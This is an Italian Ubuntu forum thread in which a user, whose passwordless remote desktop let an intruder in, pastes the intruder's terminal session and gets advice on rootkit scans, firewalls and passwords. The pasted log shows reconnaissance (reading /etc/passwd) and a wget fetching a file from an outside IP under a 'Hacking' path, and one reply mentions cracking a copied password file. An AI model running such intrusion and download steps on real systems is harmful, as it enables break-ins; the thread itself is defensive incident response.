Hacker nel mio pc!

[chrys75]

Chiedo aiuto per difendere il mio ubuntu!

Oggi mi sono ritrovato il pc con il terminale aperto e un tizio (???) che mi stava bello bello sbirciando dentro >:( >:( >:(


Voveo sapere prima di tutto che cosa stava facendo, ecco la copia del terminale:

chrys75@chrys75pc:~$ uname -a
Linux chrys75pc 2.6.17-10-386 #2 Fri Oct 13 18:41:40 UTC 2006 i686 GNU/Linux
chrys75@chrys75pc:~$ uptime
14:08:25 up 28 min, 2 users, load average: 0.14, 0.16, 0.18
chrys75@chrys75pc:~$ cat /etc/passwd
root0:0:root:/root:/bin/bash
daemon1:1:daemon:/usr/sbin:/bin/sh
bin2:2:bin:/bin:/bin/sh
sys3:3:sys:/dev:/bin/sh
sync4:65534:sync:/bin:/bin/sync
games5:60:games:/usr/games:/bin/sh
man6:12/var/cache/man:/bin/sh
lp7:7:lp:/var/spool/lpd:/bin/sh
mail8:8:mail:/var/mail:/bin/sh
news9:9:news:/var/spool/news:/bin/sh
uucp10:10:uucp:/var/spool/uucp:/bin/sh
proxy13:13:proxy:/bin:/bin/sh
www-data33:33:www-data:/var/www:/bin/sh
backup34:34:backup:/var/backups:/bin/sh
list38:38:Mailing List Manager:/var/list:/bin/sh
irc39:39:ircd:/var/run/ircd:/bin/sh
gnats41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody65534:65534:nobody:/nonexistent:/bin/sh
dhcp101:101::/nonexistent:/bin/false
syslog102:102::/home/syslog:/bin/false
klog103:103::/home/klog:/bin/false
cupsys100:106::/home/cupsys:/bin/false
messagebus104:107::/var/run/dbus:/bin/false
haldaemon108:108:Hardware abstraction layer,,,:/var/run/hal:/bin/false
hplip105:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm106:111:Gnome Display Manager:/var/lib/gdm:/bin/false
chrys751000christian,,,:/home/chrys75:/bin/bash
avahi107:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
chrys75@chrys75pc:~$ adduser
adduser: Solamente l'utente root può aggiungere un utente o un gruppo al sistema.
chrys75@chrys75pc:~$ passwd
Changing password for chrys75
(current) UNIX password:
passwd: Authentication failure
passwd: password unchanged
chrys75@chrys75pc:~$ passwd
Changing password for chrys75
(current) UNIX password:
passwd: Authentication failure
passwd: password unchanged
chrys75@chrys75pc:~$ wget Linux chrys75pc 2.6.17-10-386 #2 Fri Oct 13 18:41:40 UTC 2006 i686 GNU/Linux
--14:10:32-- http://linux/
=> `index.html'
Risoluzione di linux in corso... fallito: Nome o servizio sconosciuto.
--14:10:33-- http://chrys75pc/
=> `index.html'
Risoluzione di chrys75pc in corso... 127.0.0.1
Connessione a chrys75pc|127.0.0.1:80... fallito: Connessione rifiutata.
--14:10:33-- http://2.6.17-10-386/
=> `index.html'
Risoluzione di 2.6.17-10-386 in corso... fallito: Nome o servizio sconosciuto.

FINITO --14:10:35--
Scaricati: 0 byte in 0 file
chrys75@chrys75pc:~$ wget http://209.85.6.18/Hacking/05172



e poi come è riuscito ad entrare ed eventualmente come proteggermi!

Grazie attendo un aiuto! Lascio il pc acceso per amule ma ora ho paura!!!!

Con windows non mi era mai successo :'( :'( :'(

[salarr]

connessione wireless?

[chrys75]

spenta. Stava usando la rete internet, infatti si è fermato staccando la linea! Ho notato che mentre stavo navigando ne menù avevo attivato desktop remoto senza pasword di accesso... può essere entrato da li?

Mi sai dire se ha fatto qualche cosa o l'ho fermanto in tempo?? Ho notato che voleva creare un altro utente ma non ci è riuscito perchè non aveva privilegi di root.... giusto??

Come di devo comportare???

[Stealth]

Intanto fai così, per vedere se fosse riuscito a seminare qualcosa.....dal terminale non si direbbe, ma non si sa mai:

Codice: Seleziona tutto

sudo apt-get installa chkrootkit rkhunter

sono 2 programmi per cercare robaccia nel tuo sistema, li lanci da terminale con sudo e vedi cosa ti dicono.
Non so se hai un firewall configurato, nel caso pensaci (anche se forse, in questo caso....) e a occhio direi che, senza la password di root non è andato da nessuna parte, al massimo poteva sfasciarti la home utente.
Mi sembra anche che fosse un po' sprovveduto, usava la versione del tuo kernel come un IP...o sa qualcosa che io non so, oppure.......boh?
ciao

[chrys75]

ecco cosa mi esce... che dici??

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not found
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/firefox/.autoreg
/usr/lib/jvm/.java-gcj.jinfo
/lib/modules/2.6.17-10-386/volatile/.mounted

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... /usr/lib/security
/usr/lib/security/classpath.security
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... lo: not promisc and no packet sniffer sockets
eth0: PACKET SNIFFER(/sbin/dhclient3[3450])
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... user root deleted or never logged from lastlog!
chrys75@chrys75pc:~$

Grazie intanto delle risposte che mi dai!
Qualche firewall consigli?? Ne esiste uno da sinaptic???

Grazie

[mefisto]

Sembra tutto ok, non mi pare abbia seminato nulla .... tuttavia lascio la parola a qualche esperto.

Per il firewall ... linux ha iptables ... puoi configurarlo da terminale oppure usare una delle sue GUI che installi da synaptic (guarddog, firestarter ...)
Nella sezione sicurezza trovi diverse informazioni, prova a leggere un pò di quella documentazione.

[Giambo]

e poi come è riuscito ad entrare ed eventualmente come proteggermi!

Piu'' sotto mi pare hai detto che avevi attivato desktop remoto senza password
Praticamente come lasciare la porta di casa spalancata e un cartello "benvenuti !" !

Grazie attendo un aiuto! Lascio il pc acceso per amule ma ora ho paura!!!!

Non pare che il lamerozzo sia riuscito a fare danni. Metti subito una password al desktop remoto. E una password in ordine, con numeri e lettere a casaccio !

Con windows non mi era mai successo :''( :''( :''(

Prova a abilitare desktop remoto senza password, poi vediamo !

[chrys75]

Disabilitato subito!! Quando parlavo di windows ancora avevo notato di aver inserito desktop remoto senza psw!! :P


Grazie a tutti!

[inverse]

Mi fai capire come hai fatto il log del terminale??
Oppure hai trovato il desktop con un terminale acceso, e questi comandi scritti sopra??

[Divilinux]

la pass non l'ha fregata..a meno che nn si e' copiato il file /etc/passwd..allora potrebbe averlo tranquillamente crackato con john the ripper o rainbow crack
lo sprovveduto cercava di scaricare qualcosa sul computer pero' dimenticandosi che al server (magari messo su da lui) locale puo' accedere solo lui
ecco il perche' del wget che rimanda "address not found"

Codice: Seleziona tutto

Connessione a chrys75pc|127.0.0.1:80

non credo ti abbia installato un rootkit se tutto quello che ha fatto e' li in quella shell,cmq la connessione wireless va criptata..altrimenti entra chiunque (good)

[DktrKranz]

Se non sbaglio esiste un log per le sessioni remote. Puoi guardare all'interno di quel file alla ricerca di un indirizzo IP in modo da effettuare una segnalazione alle autorità.

[Divilinux]

..e siccome l'ip e' niente senza oario..per vedere quando e chi ha usato quella shell basta digitare

ps aux | grep bash

[chrys75]

aveva ancora il terminale aperto, quindi ho fatto copia/incolla!

Purtroppo ho riavviato il pc e non ho più l'indirizzo ip!

Ma ora è tutto protetto!!

[paper0k]

Prova cmq a vedere con

Codice: Seleziona tutto

last

cosa ottieni